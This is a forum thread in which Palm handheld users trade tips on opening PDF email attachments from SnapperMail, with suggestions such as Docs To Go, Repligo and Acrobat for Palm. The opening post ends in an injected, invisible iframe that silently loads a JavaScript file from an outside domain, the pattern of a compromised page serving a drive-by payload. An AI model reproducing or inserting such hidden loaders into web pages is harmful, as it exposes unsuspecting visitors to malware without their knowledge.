+ Reply to Thread

Acrobat reader or RichReader

I need some help, I have search the forum, but haven't found the answer I need. I use SnapperMail and love it, but when I receive a pdf file via Snappermail, the only thing I know to do is transfer it to the SD. Once I transfer it to the SD, how do I open it? The only way I know how to find it on the card is via the FileManager. Once in FilManager, how do you open pdf file? thanks in advance to who ever helps me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Acrobat reader or RichReader

Originally posted by LLCOOLJ
    I need some help, I have search the forum, but haven't found the answer I need. I use SnapperMail and love it, but when I receive a pdf file via Snappermail, the only thing I know to do is transfer it to the SD. Once I transfer it to the SD, how do I open it? The only way I know how to find it on the card is via the FileManager. Once in FilManager, how do you open pdf file? thanks in advance to who ever helps me.
    In your case I'm not sure what is the solution. If you were going to use rich reader though, the only way you could use it is to copy the attachment to a computer to then convert it to a file format that richReader can understand.

If Acrobat is out on the palm then it would probably be the best bet.

I would suggest searching sites like handgo(sorry about the spelling) for pdf readers. There might be some freeware or shareware out there that can accomplish it.

PDFs

Dataviz' Docs-To-Go Premium (for $69.95) includes PDF support, in addition to almost all other major attachment types.

While Adobe's Acrobat for Palm version is free, it only claims to render PDFs that are sync'd directly with a PC or Mac, not for emailed attachments. Check the Adobe Acrobat for Palm user forum to see if anyone has resolved the emailed PDF issue, and let us know.

Repligo is pretty sweet. its 40 bucks and its quicker on the palm than adobe. it treats any file like an acrobat on the palm.

http://www.cerience.com/products/index.htm

Does Doc To Go open pdfs as an attachment or only when they were synced?

Regligo looks pretty good only for viewing documents and not editing. I would rather not look at documents on my desktop before syncing with the 7135. When I receive a pdf file via email (SnapperMail) I then want to transfer the pdf email attachment to the SC and open it. I know that there is a bug in Transferring pdf attachments from SnapperMail to Acrobat Reader version 2.

Originally posted by LLCOOLJ
    Does Doc To Go open pdfs as an attachment or only when they were synced?
    As an attachment.

so is there anything else besides (snappermail?) that can open a pdf file which is on the sd? not synced... +++ craig
    www.EmailPush.com
    Email + SMS = Power

pdf files

I have not been able to use any email software to open email attachments that are created in pdf. I only use Snappermail version 1.8 and it does not support pdf and it seems to be the best program to open , excel, word, and power point. If you find something, let me know, otherwise I need to stay with Snappermail.